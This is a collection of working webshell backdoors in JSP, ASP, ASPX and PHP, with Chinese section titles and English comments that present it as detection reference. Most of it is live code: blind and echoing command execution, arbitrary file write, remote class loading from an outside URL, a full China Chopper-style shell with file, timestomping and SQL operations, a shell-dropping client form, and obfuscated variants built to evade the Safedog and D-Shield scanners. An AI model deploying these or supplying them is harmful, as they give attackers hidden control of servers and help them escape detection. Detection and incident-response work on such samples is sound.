JSP (server-side backdoor samples; every one below runs attacker-supplied input with the web server's privileges — read them as detection/IR reference, not as something to deploy):
无回显 / no output (blind execution: the command runs but the response body is empty): http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls
<%-- Blind command execution: the value of the "i" query parameter is handed to
     Runtime.exec() and the process output is discarded, so the caller sees nothing.
     There is no authentication of any kind; anyone who can reach the page runs
     commands as the OS user of the servlet container. --%>
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
有回显 / with output (stdout is returned; gated only by the hard-coded "pwd=023"): http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls


<%-- Command execution with output. The "i" parameter is executed only when "pwd"
     equals the hard-coded "023" (a plain String.equals; a trivial gate, not real
     authentication); stdout of the process is streamed back inside <pre>.
     stderr is never read, so a failing command yields an empty block, and
     new String(b,0,a) decodes each 2048-byte chunk with the platform default
     charset, which can split multi-byte characters. The process stream is not closed.
     NOTE(review): the "<pre>" and "</pre>" literals are broken across lines in this
     listing; a Java string literal cannot span a line break, so that is almost
     certainly a transcription artifact rather than the original code. --%>
<% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("
<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b,0,a));
}
out.print("</pre>
");
}
%>
客户端写入 / file write driven by the client (each variant below writes the raw bytes of parameter "c" to the path named in "f"; none of them validates "f"):
http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234


<%-- Arbitrary file write: parameter "c" is written verbatim to the path in "f".
     The path is used as-is (absolute paths and ".." accepted), so this writes
     anywhere the container's OS user can; the example URL above targets a path
     outside the web root. An existing file is truncated. The stream is never closed. --%>
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234


<%-- Same write, rooted at the web application's real path. "f" is still not
     sanitised, so "../" escapes the web root. getRealPath("/") can return null
     (e.g. for an unexploded WAR), in which case the target becomes "null/<f>"
     relative to the JVM's working directory. The stream is never closed. --%>
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234


<%-- RandomAccessFile variant of the arbitrary write. Mode "rw" does not truncate:
     the bytes of "c" overwrite from offset 0 and any longer pre-existing content
     keeps its tail, so the result can be a mix of new and old data. The file is
     never closed. --%>
<%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234


<%-- RandomAccessFile write rooted at the web root. As above, "rw" overwrites in
     place without truncating, "f" is unvalidated (".." escapes the root), and
     getRealPath("/") may be null. The file is never closed. --%>
<%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
反射调用外部jar / load a class from a remote jar and invoke it via reflection (URLClassLoader):
http://192.168.16.240:8080/Shell/reflect.jsp?u=http://javaweb.org/Cat.jar&023=A


<%-- Remote class loading: builds a URLClassLoader over the URL in parameter "u",
     loads a class named "Load" from it, invokes the first element of getMethods()
     as a static method (null receiver) with the whole request parameter map, and
     prints the return value. getMethods() has no guaranteed order, so which method
     ends up at index 0 is implementation-dependent. The fetched code runs in-process
     with the JVM's full privileges; the extra "023=A" in the example URL is simply
     passed through to it inside the parameter map. --%>
<%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{request.getParameterMap()})%>
常规 / standard file-drop variant (server side of the HTML client further below):


<%-- File-drop server for the HTML client below: when parameter "f" is present,
     the raw bytes of parameter "t" are written to getRealPath("\\") + f. The
     backslash root is Windows-style; on other platforms getRealPath("\\") may not
     resolve to the web root. "f" is not sanitised, "t" is not null-checked (a
     missing "t" throws NullPointerException), and the stream is never closed. --%>
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>


<%-- Full-featured JSP webshell, server side. The request layout (the parameter
     named by Pwd carrying a one-letter opcode, z0/z1/z2 as arguments, the reply
     framed by "->|" and "|<-") matches the wire protocol of the China Chopper
     (中国菜刀) client. Every operation runs as the OS user of the servlet
     container; the only "authentication" is knowing the parameter name in Pwd.
     Detection hint: the "->|"/"|<-" framing and the z0/z1/z2 parameter names are
     reliable indicators in web-server and proxy logs. --%>
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
<%-- Name of the request parameter whose VALUE selects the operation (A..Q). --%>
<%!String Pwd = "pass";

// Charset-conversion hook. The conversion is commented out, so this is the identity.
String EC(String s, String c) throws Exception {
return s;
}//new String(s.getBytes("ISO-8859-1"),c);}

// Opens a JDBC connection from a CRLF-separated spec:
//   line 0 = driver class name, line 1 = JDBC URL, optional line 2 = catalog.
// Class.forName(...).newInstance() instantiates whatever class name the caller
// sends, which is not limited to JDBC drivers.
Connection GC(String s) throws Exception {
String[] x = s.trim().split("\r\n");
Class.forName(x[0].trim()).newInstance();
Connection c = DriverManager.getConnection(x[1].trim());
if (x.length > 2) {
c.setCatalog(x[2].trim());
}
return c;
}

// Appends the first two characters of every filesystem root (e.g. "C:" on
// Windows). Used by op A only when the web-root path does not start with "/".
void AA(StringBuffer sb) throws Exception {
File r[] = File.listRoots();
for (int i = 0; i < r.length; i++) {
sb.append(r[i].toString().substring(0, 2));
}
}

// Op B: directory listing. One entry per line with name, mtime, size and R/W
// flags; directories are appended directly, files are collected in sF and
// appended afterwards. listFiles() returns null for a non-directory or
// unreadable path, so l.length then throws NullPointerException, which the
// dispatcher reports as "ERROR://".
void BB(String s, StringBuffer sb) throws Exception {
File oF = new File(s), l[] = oF.listFiles();
String sT, sQ, sF = "";
java.util.Date dt;
SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
for (int i = 0; i < l.length; i++) {
dt = new java.util.Date(l[i].lastModified());
sT = fm.format(dt);
sQ = l[i].canRead() ? "R" : "";
sQ += l[i].canWrite() ? " W" : "";
if (l[i].isDirectory()) {
sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()
+ "\t" + sQ + "\n");
} else {
sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"
+ sQ + "\n";
}
}
sb.append(sF);
}

// Op E: recursive delete. Children are deleted first (recursing into any child
// that delete() could not remove, i.e. a non-empty directory), then the path
// itself. Every delete() return value is ignored.
void EE(String s) throws Exception {
File f = new File(s);
if (f.isDirectory()) {
File x[] = f.listFiles();
for (int k = 0; k < x.length; k++) {
if (!x[k].delete()) {
EE(x[k].getPath());
}
}
}
f.delete();
}

// Op F: file download. Resets the response, then writes the raw file bytes
// framed by "->|" and "|<-" straight to the servlet output stream (no
// Content-Type is set). Because the raw stream is taken and closed here, the
// dispatcher's later out.print(...) can no longer contribute to the response
// (depending on the container it is dropped or raises IllegalStateException);
// what the client receives is the framed file written here.
void FF(String s, HttpServletResponse r) throws Exception {
int n;
byte[] b = new byte[512];
r.reset();
ServletOutputStream os = r.getOutputStream();
BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
os.write(("->" + "|").getBytes(), 0, 3);
while ((n = is.read(b, 0, 512)) != -1) {
os.write(b, 0, n);
}
os.write(("|" + "<-").getBytes(), 0, 3);
os.close();
is.close();
}

// Op G: binary upload. d is a string of uppercase hex pairs decoded against
// "0123456789ABCDEF" and written to s. indexOf returns -1 for any other
// character (lowercase hex included), silently corrupting the output; an
// odd-length d throws StringIndexOutOfBoundsException at charAt(i + 1).
void GG(String s, String d) throws Exception {
String h = "0123456789ABCDEF";
int n;
File f = new File(s);
f.createNewFile();
FileOutputStream os = new FileOutputStream(f);
for (int i = 0; i < d.length(); i += 2) {
os
.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d
.charAt(i + 1))));
}
os.close();
}

// Op H: recursive copy of s to d. Directories are created one level at a time
// with mkdir(); files are copied in 512-byte chunks. Streams are not closed if
// an exception interrupts the copy.
void HH(String s, String d) throws Exception {
File sf = new File(s), df = new File(d);
if (sf.isDirectory()) {
if (!df.exists()) {
df.mkdir();
}
File z[] = sf.listFiles();
for (int j = 0; j < z.length; j++) {
HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());
}
} else {
FileInputStream is = new FileInputStream(sf);
FileOutputStream os = new FileOutputStream(df);
int n;
byte[] b = new byte[512];
while ((n = is.read(b, 0, 512)) != -1) {
os.write(b, 0, n);
}
is.close();
os.close();
}
}

// Op I: rename/move. The boolean result of renameTo() is ignored, so the
// dispatcher reports "1" even when nothing was moved.
void II(String s, String d) throws Exception {
File sf = new File(s), df = new File(d);
sf.renameTo(df);
}

// Op J: create a single directory level (mkdir, not mkdirs); result ignored.
void JJ(String s) throws Exception {
File f = new File(s);
f.mkdir();
}

// Op K: set a file's last-modified time from a "yyyy-MM-dd HH:mm:ss" string
// (parsed in the JVM's default time zone). This is a timestomping primitive:
// the mtime of a dropped file can be made to match its neighbours.
void KK(String s, String t) throws Exception {
File f = new File(s);
SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
java.util.Date dt = fm.parse(t);
f.setLastModified(dt.getTime());
}

// Op L: fetch URL s over HTTP(S) via HttpURLConnection and write the body to
// file d. The cast to HttpURLConnection fails with ClassCastException for
// non-HTTP URLs (reported as "ERROR://").
void LL(String s, String d) throws Exception {
URL u = new URL(s);
int n;
FileOutputStream os = new FileOutputStream(d);
HttpURLConnection h = (HttpURLConnection) u.openConnection();
InputStream is = h.getInputStream();
byte[] b = new byte[512];
while ((n = is.read(b, 0, 512)) != -1) {
os.write(b, 0, n);
}
os.close();
is.close();
h.disconnect();
}

// Appends every line of is to sb with CRLF terminators, decoding with the
// platform default charset. Used by op M for the process's stdout and stderr.
void MM(InputStream is, StringBuffer sb) throws Exception {
String l;
BufferedReader br = new BufferedReader(new InputStreamReader(is));
while ((l = br.readLine()) != null) {
sb.append(l + "\r\n");
}
}

// Op N: list database catalogs, tab-separated. s is a GC() connection spec.
void NN(String s, StringBuffer sb) throws Exception {
Connection c = GC(s);
ResultSet r = c.getMetaData().getCatalogs();
while (r.next()) {
sb.append(r.getString(1) + "\t");
}
r.close();
c.close();
}

// Op O: list table names (type TABLE only), tab-separated.
void OO(String s, StringBuffer sb) throws Exception {
Connection c = GC(s);
String[] t = { "TABLE" };
ResultSet r = c.getMetaData().getTables(null, null, "%", t);
while (r.next()) {
sb.append(r.getString("TABLE_NAME") + "\t");
}
r.close();
c.close();
}

// Op P: describe the columns of the table named on line 3 of the spec by
// running "select * from <x[3]>" (the table name is concatenated into the
// SQL unquoted). 1005/1007 are ResultSet.TYPE_SCROLL_SENSITIVE and
// CONCUR_READ_ONLY. Only the column names/types are reported, not rows.
void PP(String s, StringBuffer sb) throws Exception {
String[] x = s.trim().split("\r\n");
Connection c = GC(s);
Statement m = c.createStatement(1005, 1007);
ResultSet r = m.executeQuery("select * from " + x[3]);
ResultSetMetaData d = r.getMetaData();
for (int i = 1; i <= d.getColumnCount(); i++) {
sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)
+ ")\t");
}
r.close();
m.close();
c.close();
}

// Op Q: run an arbitrary SQL statement q. It is first tried as a query and the
// result set is rendered as "|"-separated rows; if executeQuery throws (e.g. for
// DML/DDL) it is re-run with executeUpdate and the outcome or the exception text
// is appended. 1008 is ResultSet.CONCUR_UPDATABLE.
void QQ(String cs, String s, String q, StringBuffer sb) throws Exception {
int i;
Connection c = GC(s);
Statement m = c.createStatement(1005, 1008);
try {
ResultSet r = m.executeQuery(q);
ResultSetMetaData d = r.getMetaData();
int n = d.getColumnCount();
for (i = 1; i <= n; i++) {
sb.append(d.getColumnName(i) + "\t|\t");
}
sb.append("\r\n");
while (r.next()) {
for (i = 1; i <= n; i++) {
sb.append(EC(r.getString(i), cs) + "\t|\t");
}
sb.append("\r\n");
}
r.close();
} catch (Exception e) {
sb.append("Result\t|\t\r\n");
try {
m.executeUpdate(q);
sb.append("Execute Successfully!\t|\t\r\n");
} catch (Exception ee) {
sb.append(ee.toString() + "\t|\t\r\n");
}
}
m.close();
c.close();
}%>


<%-- Dispatcher. z0 = charset (default "gbk"), the parameter named by Pwd = opcode,
     z1/z2 = operation arguments. The reply is framed by "->|" ... "|<-" and any
     exception is reported inline as "ERROR:// ...", so the shell never returns an
     HTTP error status. --%>
<%
String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + "";
// NOTE(review): getParameter("z0") above has already parsed the request
// parameters, so setCharacterEncoding here is too late to affect their decoding.
request.setCharacterEncoding(cs);
response.setContentType("text/html;charset=" + cs);
String Z = EC(request.getParameter(Pwd) + "", cs);
String z1 = EC(request.getParameter("z1") + "", cs);
String z2 = EC(request.getParameter("z2") + "", cs);
StringBuffer sb = new StringBuffer("");
try {
sb.append("->" + "|");
// A: report the on-disk directory of this JSP; on non-"/" (Windows) paths also
// append the drive letters.
if (Z.equals("A")) {
String s = new File(application.getRealPath(request
.getRequestURI())).getParent();
sb.append(s + "\t");
if (!s.substring(0, 1).equals("/")) {
AA(sb);
}
// B: list directory z1.
} else if (Z.equals("B")) {
BB(z1, sb);
// C: read file z1 line by line (platform default charset).
} else if (Z.equals("C")) {
String l = "";
BufferedReader br = new BufferedReader(
new InputStreamReader(new FileInputStream(new File(
z1))));
while ((l = br.readLine()) != null) {
sb.append(l + "\r\n");
}
br.close();
// D: write text z2 to file z1 (truncating); "1" signals success.
} else if (Z.equals("D")) {
BufferedWriter bw = new BufferedWriter(
new OutputStreamWriter(new FileOutputStream(
new File(z1))));
bw.write(z2);
bw.close();
sb.append("1");
// E: recursive delete of z1.
} else if (Z.equals("E")) {
EE(z1);
sb.append("1");
// F: download file z1 (FF takes over the response).
} else if (Z.equals("F")) {
FF(z1, response);
// G: write hex-encoded z2 to file z1.
} else if (Z.equals("G")) {
GG(z1, z2);
sb.append("1");
// H: copy z1 to z2.
} else if (Z.equals("H")) {
HH(z1, z2);
sb.append("1");
// I: rename z1 to z2.
} else if (Z.equals("I")) {
II(z1, z2);
sb.append("1");
// J: mkdir z1.
} else if (Z.equals("J")) {
JJ(z1);
sb.append("1");
// K: set mtime of z1 to timestamp z2.
} else if (Z.equals("K")) {
KK(z1, z2);
sb.append("1");
// L: download URL z1 to file z2.
} else if (Z.equals("L")) {
LL(z1, z2);
sb.append("1");
// M: command execution. The first two characters of z1 are the interpreter
// flag and the remainder the interpreter path (e.g. "-c/bin/sh" or "/ccmd"),
// z2 is the command line; stdout then stderr are appended to the reply.
} else if (Z.equals("M")) {
String[] c = { z1.substring(2), z1.substring(0, 2), z2 };
Process p = Runtime.getRuntime().exec(c);
MM(p.getInputStream(), sb);
MM(p.getErrorStream(), sb);
// N/O/P/Q: database operations; z1 is the connection spec, z2 the SQL for Q.
} else if (Z.equals("N")) {
NN(z1, sb);
} else if (Z.equals("O")) {
OO(z1, sb);
} else if (Z.equals("P")) {
PP(z1, sb);
} else if (Z.equals("Q")) {
QQ(cs, z1, z2, sb);
}
} catch (Exception e) {
sb.append("ERROR" + ":// " + e.toString());
}
sb.append("|" + "<-");
out.print(sb.toString());
%>
JSP后门连接 / JSP backdoor client: an HTML form that POSTs the code typed in "t" and the file name "f" to whatever URL is entered, i.e. to the file-drop server page (whose source is repeated in the lower textarea):


<!-- Client page for the file-drop server shown earlier. The button's onclick sets
     the form action to the URL typed in "url" and submits "t" (code) and "f"
     (file name, default shell.jsp) by POST; the server page writes "t" into the
     web root under that name. NOTE(review): in the embedded server code below,
     getRealPath("\") has a lone backslash, which escapes the closing quote and
     would not compile as Java; the working form is getRealPath("\\") as in the
     earlier listing. If this client is itself served as a .jsp rather than .html,
     the scriptlet inside the textarea would also be executed. -->
<html><head><title>JSP一句话木马客户端</title></head><div align=center> <font color=red>专用JSP木马连接器</font><br><form name=get method=post>服务端地址<input name=url size=110 type=text> <br><br><textarea name=t rows=20 cols=120>你提交的代码</textarea><br>保存成的文件名:<input name=f size=30 value=shell.jsp><input type=button onclick="javascript:get.action=document.get.url.value;get.submit()" value=提交> </form> <br>服务端代码:<br><textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> </textarea> </div></body>
下载远程文件 / fetch a remote URL ("u") and write it to an absolute path ("f"):
http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png


<%-- Remote download to disk: opens the URL in parameter "u" with URL.openStream()
     (any protocol handler the JVM has, e.g. http, https, file, jar, ftp), buffers
     the whole body in memory, then writes it to the path in "f". Absolute paths
     are accepted; there is no size limit, and neither stream is closed. --%>
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; while ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
下载web路径 / same download, writing under the web root (the "f" path is still unvalidated):
http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png


<%-- Remote download into the web root: identical to the previous sample except
     that "f" is appended to getRealPath("/"). "../" in "f" still escapes the root,
     getRealPath("/") may be null, and neither stream is closed. --%>
<% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; while ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
ASP:
<%' Classic ASP one-liner: the "chopper" request parameter (query string, form
'   or cookie, as Request() searches all collections) is evaluated as VBScript.
'   Eval evaluates an expression; the Execute/ExecuteGlobal variants below run
'   statements. No authentication beyond knowing the parameter name. %>
<%eval request("chopper")%>
常规 / standard ASP one-liners (Eval/Execute/ExecuteGlobal spellings; all run a request parameter as VBScript, differing only in how the call is written):


<%' Execute runs the parameter as VBScript statements. %>
<%execute request("chopper")%>

<%execute(request("chopper"))%>

<%' ExecuteGlobal runs it in the page's global scope. %>
<%ExecuteGlobal request("chopper")%>

<%' chr(35) is "#", so this evaluates request("#"). %>
<%Eval(Request(chr(35)))%>

<%dy=request("c")%><%Eval(dy)%>

<%' Persistent variant: once "c" has been sent, the code is stored in the session
'   and re-executed on every later request of that session, even with no parameter. %>
<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>

<% if Request("c")<>"" then ExecuteGlobal request("c") end if %>

<%' The trailing scriptlet holds only a comment ("loop" text after an apostrophe);
'   it is padding aimed at scanners, not code. %>
<%execute request("c")%><%'<% loop <%:%>

<%' "< %" with a space is not a scriptlet opener, so as written this line emits
'   literal text before the execute; it may be garbled in this copy. %>
< %'<% loop <%:%><%execute request("a")%>

<%' <script runat=server> is the alternative server-side block syntax. %>
<script language=vbs runat=server>eval(request("c"))</script>

<script language=VBScript runat=server>execute request("#")</script>

<%' chr(114..116) spells "request"; the inner eval resolves that name to the
'   Request object, whose default property is then read with "c". %>
<%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%>

<%' The concatenation spells out the string "eval(request(0-2-5))". %>
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>

<%' unescape() yields: eval request("aaa") %>
<%execute(unescape("eval%20request%28%22aaa%22%29"))%>


<%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>
<%' Codepage 65000 is UTF-7, so the source is UTF-7-decoded before parsing. Each
'   "+j-" is an empty shift sequence (a single 6-bit group yields no character) and
'   "+ACI-" decodes to a double quote, so the last scriptlet decodes to
'   execute(request("#")). The obfuscation only hides the keyword from scanners
'   that do not decode UTF-7. NOTE(review): the curly quotes around 936 look like a
'   transcription artifact; the original presumably used plain ASCII quotes, as in
'   the later variant that sets response.codepage=936. %>


<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==~b0~"+$E+kYvEmr#@!@*rJ~O4+x,36 mEDn!VK4mV~Dn5!+dYvEmr#~n NPrW,SBMAAA==^#~@%>
<!-- Microsoft Script Encoder (VBScript.Encode) sample: the #@~^ ... ^#~@ block is
     an encoded VBScript scriptlet. Its plaintext is not shown on this page; decode
     it with a screnc/VBE decoder before drawing conclusions about what it runs.
     (An HTML comment is used here because the @LANGUAGE directive must stay the
     first thing in the file.) -->
过雷客图 / samples meant to evade the 雷客图 ASP webshell scanner (all three still reduce to execute(request(...))):


<%' MSScriptControl variant: creates a second VBScript engine, hands it the ASP
'   intrinsic objects, then runs execute(request(chr(35))), i.e. request("#").
'   The "ex"&"e"&"cute" split and the COM indirection keep the literal keyword out
'   of the file; the effect is the same as the plain one-liners. %>
<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"e"&"cute(request(chr(35)))")%>
<%
password=Request("class")
' The hex string decodes to "Execute(password)", so this runs the "class" request
' parameter as VBScript. AACode consumes two hex digits per step; the IsNumeric
' branch handles pairs starting with a digit, otherwise four characters are taken
' (i=i+2). Every pair in this particular string starts with a digit.
Execute(AACode("457865637574652870617373776F726429")):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute("AACode=AACode&chr(&H"&c&")"):Else:Execute("AACode=AACode&chr(&H"&c&Mid(s,i+2,2)&")"):i=i+2:End If:Next:End Function
%>
<%
password=Request("class")
' Each %-separated number minus 18 is a character code; the string decodes to
' "Execute(password)", again running the "class" request parameter as VBScript.
Execute(DeAsc("%87%138%119%117%135%134%119%58%130%115%133%133%137%129%132%118%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function
%>
ASPX:
常规免杀 / basic scanner evasion (JScript.NET eval in "unsafe" mode, with the keyword assembled at run time)


<%@ Page Language="Jscript"%>
<%
// JScript.NET backdoor: the "M" request parameter is passed to eval().
// "un" + Char(115) + Char(97) + "fe" assembles the string "unsafe" at run time;
// eval(code, "unsafe") selects JScript.NET's unrestricted eval mode, so the
// injected code gets the full .NET API. Building the keyword from char codes
// is the evasion step (see the original author's note on that line).
var a = Request.Item["M"];
var b = "un" + Char ( 115 ) + Char ( 97 ) + "fe";// this is the key spot; the rest apparently is not checked (original comment)
eval(a,b);
Response.Write("Test");
%>
绕过安全狗 / Safedog (安全狗) bypass — note: this sample and the next are classic ASP (VBScript), not ASPX


<%
' Safedog-evasion layout of the execute(request(...)) shell: the parameter read
' and the execute are split across two scriptlets, with filler comment lines and
' the literal text "Error" (which is emitted into the response) in between,
' presumably to defeat a pattern that expects both in one place.
dim play
'
'
''''''''''''''''''
'''''''''
play = request("#")
%>
Error
<%
execute(play)
%>


<%@codepage=65000%>
<%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%>
<%' Codepage 65000 is UTF-7, so the file is decoded before parsing. Each "+k-" is
'   an empty shift sequence (one 6-bit group yields no character), so the scriptlet
'   decodes to: response.codepage=936:eval request("#") %>
过D盾 / D-Shield (D盾) bypass (JScript.NET; the sensitive strings are base64-encoded or split so they never appear literally):


<%@ Page Language="Jscript" Debug=true%>
<%
// Base64-obfuscated JScript.NET backdoor. The two literals decode to
//   a = Request.Form["pass"]   (as source text)      b = unsafe
// eval(a, b) evaluates that source, which yields the POSTed "pass" field;
// eval(c, b) then runs the field itself as JScript.NET in "unsafe" mode.
// Neither "Request.Form" nor "unsafe" appears literally in the file.
var a=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5Gb3JtWyJwYXNzIl0="));
var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dW5zYWZl"));
var c=eval(a,b);
eval(c,b);

%>
<%@ Page Language="Jscript" Debug=true%>
<%
// Same backdoor with the keyword split instead of base64-encoded: d is
// "unsa" + "fe" = "unsafe", and fun() merely returns the POSTed "pass" field,
// which eval runs as JScript.NET in unsafe mode.
var a=Request.Form["pass"];
var b="unsa",c="fe",d=b+c;
function fun()
{
return a;
}
eval(fun(),d);
%>
PHP:
常规 / standard: passes the "cmd" GET parameter straight to system():


<?php
// Minimal PHP webshell: the "cmd" GET parameter is passed verbatim to system(),
// which runs it through the OS shell and echoes its output into the response.
// No authentication; anyone who can request the file runs commands as the
// web server's user.
system($_GET['cmd']);
?>
过D盾 / D-Shield bypass (eval of request data, with the expression split so "eval($_REQUEST" never appears as one token):


<?php
// eval() backdoor: the "d" parameter ($_REQUEST, i.e. GET, POST and, depending on
// request_order, cookies) is evaluated as PHP code. The empty $a['t'] prefix does
// nothing at run time; it only breaks the eval($_REQUEST[...]) pattern that
// signature scanners look for.
$ab = $_REQUEST['d'];
$a['t'] = "";
eval($a['t'].$ab);
过安全狗 / Safedog bypass (same eval() backdoor; the extra `$a = "$a";` copy is a no-op added for the scanner)


<?php
// Same eval() backdoor on the "d" request parameter. The `$a = "$a";` line is a
// string-interpolation copy of the same value and the empty $b['test'] prefix is
// discarded by concatenation; both are present only to alter the textual
// pattern, and the executed code is exactly the contents of "d".
$a = $_REQUEST['d'];
$a = "$a";
$b['test'] = "";
eval($b['test']."$a");